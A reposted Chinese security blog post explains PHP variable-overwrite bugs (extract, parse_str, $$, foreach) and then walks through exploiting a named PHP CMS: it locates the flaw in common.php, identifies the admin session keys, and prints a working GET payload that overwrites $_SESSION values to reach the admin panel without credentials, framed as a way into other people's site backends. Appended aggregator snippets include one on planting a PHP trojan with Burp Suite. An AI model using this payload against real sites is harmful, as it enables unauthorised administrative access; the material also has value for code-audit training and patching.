.interface文件怎么看啊_怎么无密码登录网站后台?试试变量覆盖漏洞

news/2024/5/17 12:59:16/文章来源:https://blog.csdn.net/weixin_35492662/article/details/112071492
1前言

        各位师傅们有没有这样的经历,看着大佬随便爆破就可以进别人网站的后台,嘴上mmp,心里还要mmp,怎么自己的字典就那么5492ac4a1e53fca3c1266b38ab1aa738.png呢,没办法,苦求无门,只能自己另寻办法解决。经过学习发现这么个变量覆盖漏洞,可以不用账号密码登录别人的网站后台,一起来学习一下吧。

2变量的概念

(有点绕,就是用来赋值的某个东西)

学习任意一门编程语言或者其他,我们都会接触到一个东西,那就是变量。变量是什么,在百度百科中这样定义:变量来源于数学,是计算机语言中能储存计算结果或能表示值的抽象概念。

说实话我觉得很抽象,我们作为渗透测试人员,不需要了解那么深入,能够理解即可。我是这样理解的,变量就是一个盒子,可以赋予它名字,而变量覆盖呢,就是先赋予了一个名字A,后面又再赋予了一个名字B。此时,盒子的名字为B。

从代码来看,可以更直观些:

<?php $a = 1;$a = 2;echo $a;?>

efb560f7da3f434967f6f74d6efd7fe8.png

很明显,输出了后面赋值的2

3变量覆盖漏洞

     那么这为什么是一个漏洞呢,我们考虑这样一个场景,某程序前面定义了一个变量$app,这个变量的值为该程序定义的app的链接;如果我们可以通过变量覆盖将链接修改,换成我们定义的钓鱼app的链接,那么是不是所有用户都变成访问我这边了呢,当然实际作用远不如此。

4触发变量覆盖的几种情况

1、函数extract():将数组中的数据变成变量

<?php $a = "1";$my_array = array("a" =>"Cat","b" => "Dog", "c" =>"Horse");extract($my_array);echo "\$a = $a; \$b = $b; \$c =$c";?>

运行结果:$a = Cat; $b = Dog; $c = Horse

2、函数parse_str():将字符串解析到变量中

<?php        parse_str("name=hr_sec&&age=60");         echo$name."
"; //输出hr_sec echo$age; //输出60 ?>

运行结果:输出:hr_sec60

3、$$:双美元符

<?php       $a='b';      $b='a';      echo$$a; //输出a      ?>

4、foreach():将数组键值分离

<?php $a = 1;foreach(array('_COOKIE','_POST','_GET') as$_request) {foreach($$_request as $_key=>$_value)  {  $$_key=addslashes($_value);  }}echo $a; //在$_COOKIE、$_POST、$_GET传参a=*即可覆盖原来的$a=1。?>

运行结果:通过GET传参a=5,结果成功输出了传参的值,对$a进行了覆盖。

56c114e5772e1adc0b289a531e833098.png

5实战演示

1、首先还是用代码审计工具seay打开源码,全局搜索foreach

dd97c0b1b044f93f4c13763aabae3320.png

2、发现在common.php中有个很熟悉的操作,将REQUEST获取的数据进行键值分离。(那个$$也太熟悉了些)

foreach($$_request as $_k => $_v) ${$_k} = _RunMagicQuotes($_v);

effe17dff87fcc4b8dc1f3693934dfc8.png

3、右键全局追踪找到函数_RunMagicQuotes(),经分析这里就是执行了一个addslashes()函数,学过SQL注入应该都知道吧,这个就是个魔术引号的,因为我们这里不进行SQL注入,所以这里对我们无影响。

d7fd135e88ab2f6cedee3ff92715cde1.png

4、那么这里就已经发现了变量覆盖问题了,但是这里无法利用,我们需要看看哪里调用了common.php这个文件

9a09c3fcc2a1330bad3d8ede386b3bc8.png

5、这里很明显发现了一个admin/login.php的文件包含了它,点击查看

1ba7cf62bd277e5df1e75f72b4fab153.png

6、这里发现还包含了一个check.admin.php文件,看字面意思就是检查admin的,在路径:/duomiphp/check.admin.php找到了它,打开查看。

46bd32850fed0201cad69ed663714d06.png

7、这里很明显能够看到这个页面是用来检测SESSION的,就是说我们可以对$_SESSION赋值来获取权限。通过搜索groupid也可以看到值为1时表示系统管理员。

d17afbcfd5541ec9fc6657018e7c66ac.png

8、现在漏洞点在common.php,admin/login.php包含了这个页面,并且还通过SESSION判断身份,可以覆盖。但是要使SESSION生效需要开启session,那么最后就需要找一个开启了session_start()并且包含了common.php的页面。

7d05f32b7ab54c3b363718d801fa0f58.png

9、一个个点,发现在/upload/interface/comment/api/index.php页面有,当然其他也还有,师傅们自己尝试了,这里我就用这个。

91fedc4dc0840acaae7d9392b09bf75d.png

10、接下来,搭建网站并尝试访问后台

127.0.0.1/admin/

6288bad8a837e0824e8cf20255082ddc.png

11、这里看到是需要登录的,我们现在还不知道要覆盖SESSION的什么值,打开check_admin.php,在$_SESSION后面加上如下代码,这里表示输出前面获取的$_SESSION的值之后die()结束代码执行。

  die(var_dump($_SESSION));

dae59df6a14efe45e79808091b755d88.png

12、回去输入账号密码登录后台,我这里是默认的admin/admin

2bfbba0cf00f5b18a68354d8e9a5e438.png

13、登录后已经成功获取SESSION了,先记录下来

array(5) { ["duomi_ckstr"]=>string(4) "diuk" ["duomi_ckstr_last"]=> string(0)"" ["duomi_admin_id"]=> string(1) "1" ["duomi_group_id"]=>string(1) "1" ["duomi_admin_name"]=> string(5)"admin" }

d90a044d34b028e1480be3d004213d3b.png

14、这里解析一下需要的键值对(即把无用的东西删除)

$_SESSION [duomi_ckstr] => diuk(验证码,经测试也可以不用)$_SESSION [duomi_ckstr_last] => (空,那么这里可以不需要)$_SESSION [duomi_admin_id] => 1$_SESSION [duomi_group_id] => 1$_SESSION [duomi_admin_name] => admin(有人说这样就需要知道用户名才能用了,其实经过测试发现这里随便填什么都行)

15、这里可以构造payload,回忆一下common.php的变量覆盖是$$_REQUEST传参,这里为了方便直接以GET方式构造POC。POC如下:

/interface/comment/api/index.php?_SESSION[duomi_group_id]=1&_SESSION[duomi_admin_id]=1&_SESSION[duomi_admin_name]=hr_sec_ajie

16、首先访问admin.php,需要登录

2927eb94e532d8d153e5ba78e80fb4cb.png

17、访问一下构造的POC:

http://192.168.43.87/interface/comment/api/index.php?_SESSION[duomi_group_id]=1&_SESSION[duomi_admin_id]=1&_SESSION[duomi_admin_name]=hr_sec_ajie

2315ede324e011acc8da95c17d8dc0cb.png

18、重新访问http://192.168.43.87/admin/,可以看到,成功以管理员身份登录了,用户名就是我输的用户名hr_sec_ajie

c710665e362c8a6e6d34a391c238da0a.png

·END·

HR_SEC

有问题请加我大仁哥/我微信

c00f311fbc3e378042a1a5435de8ff25.png

微信号:empqMTk5ODAyMDM=

大仁哥微信号:jiangdaren000

956e33866e5fa3fd6d432bdf79886d43.png点分享dbf281bc05e18842a2a9756b231b57c3.png点收藏364801b327f9bd958c3a452818c0a65f.png点点赞a46868967ce0fc579c1dc647601e8b02.png点在看

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.luyixian.cn/news_show_809425.aspx

如若内容造成侵权/违法违规/事实不符,请联系dt猫网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

网站托管:遇到问题友链怎么办?

友情链接在网站内部起到一个沟通外联的作用&#xff0c;而且质量好的友情链接还能够优化网站的权重&#xff0c;为网站带来一部分流量。所以&#xff0c;友情链接在网站托管优化工作中虽然工作量不大&#xff0c;但是是非常重要的一部分。但是现在郑州网站建设重内容创作&#…

怎么把整个网站的代码中的一个词去掉_SEO重拎SITE命令:看收录,判降权…还能发现网站结构疏漏...

给部门编辑们提供SEO文章发布指南时&#xff0c;发现大伙对于SITE命令尚缺乏了解和应用。回到我自己入门SEO的那个时间点 &#xff0c;是先从掌握几个SEO命令开始的&#xff0c;其中最为实用的就是SITE命令&#xff0c;因为它可以查看网站的收录量。除此之外&#xff0c;SITE命…

webmatrix如何使用php,用微软的webmatrix配置PHP网站

类型&#xff1a;图像浏览大小&#xff1a;13.0M语言&#xff1a;英文 评分&#xff1a;3.6标签&#xff1a;立即下载用upupw总是报错&#xff0c;启动不起来php系统&#xff0c;后来发现php其实也是建立在iis基础之上的&#xff0c;所以改用webmatrix配置系统环境&#xff0c;…

Silverlight实例秀——可切换视图的DataTemplate(做网站必备技术)

小序&#xff1a;敏捷开发也是要有个度的。搞敏捷&#xff0c;最起码的限度是程序员要对手里使用的工具比较精通。相信大家都见过这个场景&#xff1a;问&#xff1a;“你在做什么&#xff1f;”程序员&#xff1a;“我在敏捷开发。”问&#xff1a;“这样设计不对吧……”程序…

tomcat网站根目录在哪里_千岛湖网站SEO公司哪里有,360SEO优化_万推霸屏

首页 > 新闻中心发布时间&#xff1a;2020-11-11 16:49:59 导读&#xff1a;万推霸屏为您提供千岛湖网站SEO公司哪里有,360SEO优化的相关知识与详情&#xff1a; 事实上&#xff0c;我们的技术太复杂&#xff0c;这带来了巨大的技术障碍。在进行优化的时候我们需要注意的是要…

用jekyll制作高大上的网站(一)——安装与配置

很多人会制作自己的主页&#xff0c;页面美观简洁&#xff0c;一直很在意是怎么做的。 最近公司需要做个文档库的主页&#xff0c;就研究了一些开源的工具&#xff0c;后面发现了jekyll&#xff08;读杰克尔&#xff09;&#xff0c;将纯文本转换为静态博客网站。 一、Ruby jek…

大型网站运维探讨和心得(转载)

2019独角兽企业重金招聘Python工程师标准>>> 看到一篇不错的心得体会&#xff1b;相信我们做技术的都会有或多或少的担忧自己的未来职业发展&#xff1a; 今天看到一篇心得体会&#xff0c;转过来和大家一起探讨一下&#xff1a; 一、什么是大型网站运维? 首先明确…

计算机安全知识百度,seo百度_计算机专业基础知识包括哪些内容? 计算机网络与安全基础知识...

可选中1个或多个下面的关键词&#xff0c;搜索相关资料。也可直接点“搜索资料”搜索整个问题。我是计算机专业的&#xff0c;它分为软件和硬件&#xff0c;硬件电路基础&#xff0c;电子电路&#xff0c;电脑组装&#xff0c;CPU 芯片。显卡。声卡。微机接口&#xff1b;软件c…

动态网站设计——笔记

rowspan 使用时 逐一使用可以避免多出一行 脑子多运动一点 clospan 合并行 一样的 <table style"width: 100%;"><tr><td rowspan"3"><img alt"" src"images/Screenshot_2022_0416_184734.png" style"heigh…

服务器被黑了做非法网站,网站被黑如何处理

日常生活中&#xff0c;偶尔会遇到网站被恶意植入非法信息的可能&#xff0c;那么遇到这种情形我们要以什么样的方式来判断网站是否被黑了呢&#xff1f;一、以下就是网站被黑的处理方法&#xff1a;1.可以联系主机提供商&#xff0c;对方做出应对。2.处理一些被修改过的文件。…

php url优化,PHP SEO优化之URL优化方法

PHP SEO优化之URL优化方法复制代码 代码如下:function getSeoVersion($phrase) {return preg_replace(/[^a-z0-9_-]/i, , strtolower(str_replace( , -, trim($phrase))));}// example usage:echo getSeoVersion("German cars are amazing.");时间&#xff1a; 2011-…

企业网站需要什么样内容才能满足和吸引到用户?

当今互联网发展趋势锐不可当&#xff0c;网速从2g即将迈向5g&#xff0c;随着用户的口味复制多变&#xff0c;“内容为王”应运而生逐渐被认可。既然内容那很重要&#xff0c;那企业建站过程如何进行网站内容建设呢&#xff1f;那企业网站又需要什么样内容才能满足和吸引到用户…

你的PPT花费的时间总是很多吗?这5个网站让你效率提高五倍以上

你做幻灯片的时候花费的时间是不是很多呢&#xff1f;是不是想要做一份适合职场的专业PPT总是要费尽心思呢&#xff1f;接下来我就要给大家介绍五个网站&#xff0c;绝对能让你效率提高五倍以上&#xff01;一、求字体网如果你觉得PPT自带的字体太单调了&#xff0c;想要应用新…

【pink老师--前端经典面试题】mouseover与mouseenter的区别。

mouseover与mouseenter都是上鼠标经过事件&#xff0c;在鼠标经过时触发。两者有什么区别呢 看下面代码演示。 代码的意思是父盒子里面有一个小盒子。给父盒子绑定mouseover事件&#xff0c;按道理给父盒子 绑定的事件&#xff0c;应该只有父盒子执行才对&#xff0c;但事实并…

前端进阶(做网站必备)----SEO网站优化

SEO汉译为搜索引擎优化&#xff0c;是一种利用搜索引擎的规则提高网站在有关搜索引擎内自然排名 的方式&#xff0c;换而言之就是优化后能更容易被用户搜索到。 主要从三方面优化 1、title网站标题 优化建议&#xff1a; 网站名-网站介绍。 2、description网站说明 优化建…

【仿小米商城网站】html+css 源码和效果图

导航栏鼠标经过样式&#xff1a; 侧边栏鼠标经过样式&#xff1a; 主体部分&#xff1a; 底部区域&#xff1a; 想要源码的可以留言评论哦

《网站说服力——营销型网站策划》

《网站说服力——营销型网站策划》 基本信息 作者&#xff1a; 谢松杰 出版社&#xff1a;电子工业出版社 ISBN&#xff1a;9787121221255 上架时间&#xff1a;2014-1-18 出版日期&#xff1a;2014 年1月 开本&#xff1a;16开 页码&#xff1a;352 版次&#xff1a;1-1 所…

Firefox 66 发布,阻止网站自动播放声音

开发四年只会写业务代码&#xff0c;分布式高并发都不会还做程序员&#xff1f; Firefox 66 发布了&#xff0c;此版本在桌面版中带来的新特性包括&#xff1a; Firefox 现在阻止网站自动播放声音&#xff0c;如果需要可以单独调整改进的搜索体验&#xff1a; 当打开许多选项…

网站服务器p2p更新需要多久,《彩虹六号》更新计划 将升级服务器并移除P2P功能...

《彩虹六号&#xff1a;围攻(Rainbow Six:Siege)》2.2.2更新补丁将在2017年8月9日于全平台实装。将添加最低两名玩家即可游戏的自定义比赛专属服务器、猎杀恐怖分子模式专属服务器以及其他方面的调整&#xff0c;同时在官方公告育碧透露了接下来游戏的一系列部署计划。在公告中…

kali下Burpsuite对网站后台注入php木马

先给kali浏览器设置代理 后面输入你的端口号 打开后&#xff0c;先关闭拦截 因为i我们只要拦截重要的就行了 接下来打开浏览器 访问我们搭建的网站 这时在点击开始拦截就可以了 右键空白 send to repeater 送往中继器 因为中继器是可以改包的 然后你切换到Burp的中继器 你就…